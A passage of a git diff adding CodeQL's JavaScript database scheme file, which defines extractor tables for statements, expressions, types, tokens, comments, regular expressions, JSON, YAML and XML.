@regexp_caret; + +is_greedy (int id: @regexp_quantifier ref); +range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); +range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); +is_capture (unique int id: @regexp_group ref, int number: int ref); +is_named_capture (unique int id: @regexp_group ref, string name: string ref); +is_inverted (int id: @regexp_char_class ref); +regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); +char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); +backref (unique int id: @regexp_backref ref, int value: int ref); +named_backref (unique int id: @regexp_backref ref, string name: string ref); +unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); +unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); + +// tokens +#keyset[toplevel, idx] +tokeninfo (unique int id: @token, + int kind: int ref, + int toplevel: @toplevel ref, + int idx: int ref, + varchar(900) value: string ref); + +case @token.kind of + 0 = @token_eof +| 1 = @token_null_literal +| 2 = @token_boolean_literal +| 3 = @token_numeric_literal +| 4 = @token_string_literal +| 5 = @token_regular_expression +| 6 = @token_identifier +| 7 = @token_keyword +| 8 = @token_punctuator; + +// associate comments with the token immediately following them (which may be EOF) +next_token (int comment: @comment ref, int token: @token ref); + +// JSON +#keyset[parent, idx] +json (unique int id: @json_value, + int kind: int ref, + int parent: @json_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +json_literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @json_value ref); + +json_properties (int obj: @json_object ref, + varchar(900) property: string ref, + int value: @json_value ref); + +json_errors (unique int id: @json_parse_error, + varchar(900) message: string ref); + +json_locations(unique int locatable: @json_locatable ref, + int location: @location_default ref); + +case @json_value.kind of + 0 = @json_null +| 1 = @json_boolean +| 2 = @json_number +| 3 = @json_string +| 4 = @json_array +| 5 = @json_object; + +@json_parent = @json_object | @json_array | @file; + +@json_locatable = @json_value | @json_parse_error; + +// locations +@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; + +@locatable = @file + | @ast_node + | @comment + | @line + | @js_parse_error | @regexp_parse_error + | @regexpterm + | @json_locatable + | @token + | @cfg_node + | @jsdoc | @jsdoc_type_expr | @jsdoc_tag + | @yaml_locatable + | @xmllocatable + | @configLocatable + | @template_placeholder_tag; + +hasLocation (unique int locatable: @locatable ref, + int location: @location ref); + +// CFG +entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); +exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); +guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); +case @guard_node.kind of + 0 = @falsy_guard +| 1 = @truthy_guard; +@condition_guard = @falsy_guard | @truthy_guard; + +@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; +@cfg_node = @synthetic_cfg_node | @expr_parent; + +successor (int pred: @cfg_node ref, int succ: @cfg_node ref); + +// JSDoc comments +jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); +#keyset[parent, idx] +jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, + int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); +jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); +jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); + +#keyset[parent, idx] +jsdoc_type_exprs (unique int id: @jsdoc_type_expr, + int kind: int ref, + int parent: @jsdoc_type_expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); +case @jsdoc_type_expr.kind of + 0 = @jsdoc_any_type_expr +| 1 = @jsdoc_null_type_expr +| 2 = @jsdoc_undefined_type_expr +| 3 = @jsdoc_unknown_type_expr +| 4 = @jsdoc_void_type_expr +| 5 = @jsdoc_named_type_expr +| 6 = @jsdoc_applied_type_expr +| 7 = @jsdoc_nullable_type_expr +| 8 = @jsdoc_non_nullable_type_expr +| 9 = @jsdoc_record_type_expr +| 10 = @jsdoc_array_type_expr +| 11 = @jsdoc_union_type_expr +| 12 = @jsdoc_function_type_expr +| 13 = @jsdoc_optional_type_expr +| 14 = @jsdoc_rest_type_expr +; + +#keyset[id, idx] +jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); +jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); +jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); + +@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; + +jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); + +@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; + +@optionalchainable = @call_expr | @propaccess; + +isOptionalChaining(int id: @optionalchainable ref); + +/** + * The time taken for the extraction of a file. + * This table contains non-deterministic content. + * + * The sum of the `time` column for each (`file`, `timerKind`) pair + * is the total time taken for extraction of `file`. The `extractionPhase` + * column provides a granular view of the extraction time of the file. + */ +extraction_time( + int file : @file ref, + // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. + int extractionPhase: int ref, + // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds + int timerKind: int ref, + float time: float ref +) + +/** +* Non-timing related data for the extraction of a single file. +* This table contains non-deterministic content. +*/ +extraction_data( + int file : @file ref, + // the absolute path to the cache file + varchar(900) cacheFile: string ref, + boolean fromCache: boolean ref, + int length: int ref +) + +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/*- Configuration files with key value pairs -*/ + +configs( + unique int id: @config +); + +configNames( + unique int id: @configName, + int config: @config ref, + string name: string ref +); + +configValues( + unique int id: @configValue, + int config: @config ref, + string value: string ref +); + +configLocations( + int locatable: @configLocatable ref, + int location: @location_default ref +); + +@configLocatable = @config | @configName | @configValue; diff --git a/javascript/ql/lib/upgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/semmlecode.javascript.dbscheme b/javascript/ql/lib/upgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/semmlecode.javascript.dbscheme new file mode 100644 index 000000000000..ccefb5e2d493 --- /dev/null +++ b/javascript/ql/lib/upgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/semmlecode.javascript.dbscheme @@ -0,0 +1,1194 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 = @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = @for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; +@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = @proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 = @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: @template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); +is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; +@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: @symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int ref, // constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; + +case @regexpterm.kind of + 0 = @regexp_alt +| 1 = @regexp_seq +| 2 = @regexp_caret +| 3 = @regexp_dollar +| 4 = @regexp_wordboundary +| 5 = @regexp_nonwordboundary +| 6 = 